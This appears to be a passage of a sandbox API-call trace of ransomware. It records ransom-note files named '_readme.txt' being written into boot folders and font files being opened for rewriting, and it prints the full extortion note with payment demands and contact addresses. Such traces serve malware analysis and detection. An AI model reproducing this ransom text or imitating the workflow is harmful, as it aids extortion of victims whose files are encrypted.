[0188.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.199] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0188.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.200] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.200] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.200] PathFindFileNameW (pszPath="") returned="" [0188.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.200] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.201] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.201] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.202] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e776e0 [0188.203] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0188.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.203] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0188.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.203] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.204] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.204] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.206] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*" (normalized: "c:\\boot\\fonts\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.206] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.206] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0188.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.207] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0188.207] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.207] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0188.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.208] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0188.208] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.210] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0188.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.210] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0188.210] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.211] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0188.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.211] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0188.211] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.211] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0188.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.211] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0188.211] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.211] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0188.212] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.212] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.212] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.212] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0188.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.212] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.213] PathFindFileNameW (pszPath="") returned="" [0188.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.213] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.213] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.214] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.214] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0188.215] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0188.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.216] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0188.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.216] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.216] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted 